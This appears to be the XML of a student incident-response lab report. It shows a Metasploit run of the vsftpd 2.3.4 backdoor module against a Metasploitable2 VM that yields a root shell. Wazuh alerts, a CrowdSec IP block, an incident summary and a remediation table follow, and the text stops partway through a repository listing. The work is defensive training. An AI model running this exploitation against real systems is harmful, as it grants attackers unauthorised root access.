    <w:p>
      <w:pPr>
        <w:shd w:fill="1E1E1E" w:val="clear"/>
        <w:spacing w:after="0" w:before="0"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="98FB98"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">msf6 exploit(vsftpd_234_backdoor) &gt; run</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E1E1E" w:val="clear"/>
        <w:spacing w:after="0" w:before="0"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="98FB98"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E1E1E" w:val="clear"/>
        <w:spacing w:after="0" w:before="0"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="98FB98"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">[*] 192.168.1.200:21 - Banner: 220 (vsFTPd 2.3.4)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E1E1E" w:val="clear"/>
        <w:spacing w:after="0" w:before="0"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="98FB98"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">[*] 192.168.1.200:21 - USER: 331 Please specify the password.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E1E1E" w:val="clear"/>
        <w:spacing w:after="0" w:before="0"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="98FB98"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">[+] 192.168.1.200:21 - Backdoor service has been spawned, handling...</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E1E1E" w:val="clear"/>
        <w:spacing w:after="0" w:before="0"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="98FB98"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">[+] 192.168.1.200:21 - UID: uid=0(root) gid=0(root)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E1E1E" w:val="clear"/>
        <w:spacing w:after="0" w:before="0"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="98FB98"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">[*] Found shell.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E1E1E" w:val="clear"/>
        <w:spacing w:after="0" w:before="0"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="98FB98"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">[*] Command shell session 1 opened (192.168.1.100:52341 -&gt; 192.168.1.200:6200)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E1E1E" w:val="clear"/>
        <w:spacing w:after="0" w:before="0"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="98FB98"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E1E1E" w:val="clear"/>
        <w:spacing w:after="0" w:before="0"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="98FB98"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">root@metasploitable:~# id</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E1E1E" w:val="clear"/>
        <w:spacing w:after="0" w:before="0"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="98FB98"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">uid=0(root) gid=0(root) groups=0(root)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E1E1E" w:val="clear"/>
        <w:spacing w:after="0" w:before="0"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="98FB98"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">root@metasploitable:~# whoami</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E1E1E" w:val="clear"/>
        <w:spacing w:after="0" w:before="0"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="98FB98"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">root</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="100"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:before="280" w:after="160"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2E75B6"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Phase 2: Detection — Wazuh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300"/>
        <w:gridCol w:w="700"/>
        <w:gridCol w:w="2000"/>
        <w:gridCol w:w="1100"/>
        <w:gridCol w:w="1360"/>
      </w:tblGrid>
      <w:tr>
        <w:trPr>
          <w:tblHeader/>
        </w:trPr>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Timestamp (UTC)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="13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IP</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="13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Dest IP</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="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Port</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Alert Description</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1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MITRE Technique</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1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11:00:12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192.168.1.100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192.168.1.200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21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FTP connection attempt to Metasploitable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T1190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MEDIUM</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11:00:14</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192.168.1.100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192.168.1.200</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21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VSFTPD 2.3.4 backdoor trigger string detected</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T1190</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CRITICAL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11:00:16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192.168.1.200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192.168.1.100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6200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Outbound shell connection established (port 6200)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T1059</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CRITICAL</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11:00:20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192.168.1.100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192.168.1.200</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6200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Root shell command executed: id, whoami</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T1068</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CRITICAL</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="100"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:before="280" w:after="160"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2E75B6"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Phase 3: Containment — CrowdSec</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E1E1E" w:val="clear"/>
        <w:spacing w:after="0" w:before="0"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="98FB98"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"># Add decision to block attacker IP for 24 hours</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E1E1E" w:val="clear"/>
        <w:spacing w:after="0" w:before="0"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="98FB98"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">sudo cscli decisions add --ip 192.168.1.100 --duration 24h --reason "VSFTPD exploit attempt"</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E1E1E" w:val="clear"/>
        <w:spacing w:after="0" w:before="0"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="98FB98"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E1E1E" w:val="clear"/>
        <w:spacing w:after="0" w:before="0"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="98FB98"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"># Verify decision added</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E1E1E" w:val="clear"/>
        <w:spacing w:after="0" w:before="0"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="98FB98"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">sudo cscli decisions list</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E1E1E" w:val="clear"/>
        <w:spacing w:after="0" w:before="0"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="98FB98"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> ID  | Source   | IP             | Reason               | Action | Country | Duration | Expiration</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E1E1E" w:val="clear"/>
        <w:spacing w:after="0" w:before="0"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="98FB98"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">-----|----------|----------------|----------------------|--------|---------|----------|------------</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E1E1E" w:val="clear"/>
        <w:spacing w:after="0" w:before="0"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="98FB98"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> 1   | cscli    | 192.168.1.100  | VSFTPD exploit attempt| ban   |         | 24h      | 2025-08-19</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E1E1E" w:val="clear"/>
        <w:spacing w:after="0" w:before="0"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="98FB98"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E1E1E" w:val="clear"/>
        <w:spacing w:after="0" w:before="0"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="98FB98"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"># Ping test to verify block (from target machine)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E1E1E" w:val="clear"/>
        <w:spacing w:after="0" w:before="0"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="98FB98"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">ping -c 3 192.168.1.100</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E1E1E" w:val="clear"/>
        <w:spacing w:after="0" w:before="0"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="98FB98"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"># Result: Request timeout for icmp_seq 0 — BLOCKED SUCCESSFULLY</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="100"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:before="280" w:after="160"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2E75B6"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Phase 4: Capstone Incident Report (200-Word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60"/>
              <w:left w:type="dxa" w:w="240"/>
              <w:bottom w:type="dxa" w:w="160"/>
              <w:right w:type="dxa" w:w="240"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="120"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="1F3864"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve">Incident Summary — CAP-2025-001</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="120"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:color w:val="2F2F2F"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">On 2025-08-18 at 11:00 UTC, a simulated cyberattack was executed against a Metasploitable2 virtual machine (192.168.1.200) to validate the full incident response lifecycle. The attacker (192.168.1.100, Kali Linux) exploited the VSFTPD 2.3.4 backdoor vulnerability (CVE-2011-2523) using Metasploit's vsftpd_234_backdoor module, successfully obtaining an unauthenticated root-level remote shell via port 6200. This technique maps to MITRE ATT&amp;CK T1190 (Exploit Public-Facing Application).</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="120"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:color w:val="2F2F2F"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">Wazuh detected the intrusion within 8 seconds, generating four critical alerts covering the FTP connection, backdoor trigger, shell spawning, and root command execution. Velociraptor was deployed to collect process and netstat artifacts, confirming the active root shell, attacker IP, and exploit process lineage in real time.</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="120"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:color w:val="2F2F2F"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">Containment was executed via CrowdSec, which applied a 24-hour IP block on 192.168.1.100. A ping test from the target machine confirmed the block was effective. The vulnerable VSFTPD service was patched and restarted with a hardened configuration.</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:color w:val="2F2F2F"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">Recommendations: Immediately upgrade or disable VSFTPD 2.3.4. Implement network segmentation to prevent direct exploitation of legacy services. Deploy continuous vulnerability scanning (OpenVAS weekly) to detect known CVEs. Enforce a 72-hour critical patch SLA for CVSS 9.0+ vulnerabilities.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="100"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:before="280" w:after="160"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2E75B6"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Remediation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2800"/>
        <w:gridCol w:w="1000"/>
        <w:gridCol w:w="226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Vulnerability</w:t>
            </w:r>
          </w:p>
        </w:tc>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CVSS</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Fix</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1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2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r>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="24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color w:val="2F2F2F"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">VSFTPD 2.3.4 Backdoor (CVE-2011-2523)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="9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color w:val="2F2F2F"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">10.0</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2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color w:val="2F2F2F"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Upgrade to vsftpd 3.x or disable FTP service</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1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color w:val="2F2F2F"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Low</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="22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color w:val="2F2F2F"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Immediate</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>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2F2F2F"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Anonymous FTP Enabled</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2F2F2F"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">7.5</w:t>
            </w:r>
          </w:p>
        </w:tc>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2F2F2F"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Set anonymous_enable=NO in vsftpd.conf</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1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2F2F2F"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Low</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2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2F2F2F"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Immediate</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>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2F2F2F"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">No Network Segmentation</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2F2F2F"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">6.0</w:t>
            </w:r>
          </w:p>
        </w:tc>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2F2F2F"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Isolate legacy VMs in dedicated VLAN with ACLs</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1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2F2F2F"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Medium</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2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2F2F2F"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">1 week</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2F2F2F"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">No Automated Patching</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2F2F2F"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">5.0</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2F2F2F"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Deploy automated patch management (e.g., Landscape)</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2F2F2F"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Medium</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2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2F2F2F"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">2 weeks</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:pBdr>
          <w:bottom w:val="single" w:color="2E75B6" w:sz="8" w:space="4"/>
        </w:pBdr>
        <w:spacing w:before="360" w:after="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F3864"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t xml:space="preserve">Appendix: GitHub Repository Structure</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:before="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:i w:val="false"/>
          <w:iCs w:val="false"/>
          <w:color w:val="2F2F2F"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Repository: cyart-red-teaming | Branch: main | Submission folder: Week 2</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E1E1E" w:val="clear"/>
        <w:spacing w:after="0" w:before="0"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="98FB98"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">cyart-red-teaming/</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E1E1E" w:val="clear"/>
        <w:spacing w:after="0" w:before="0"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="98FB98"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">└── Week2/</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E1E1E" w:val="clear"/>
        <w:spacing w:after="0" w:before="0"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="98FB98"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">    ├── README.md                          ← Main navigation and task summary</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E1E1E" w:val="clear"/>
        <w:spacing w:after="0" w:before="0"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="98FB98"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">    ├── docs/</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E1E1E" w:val="clear"/>
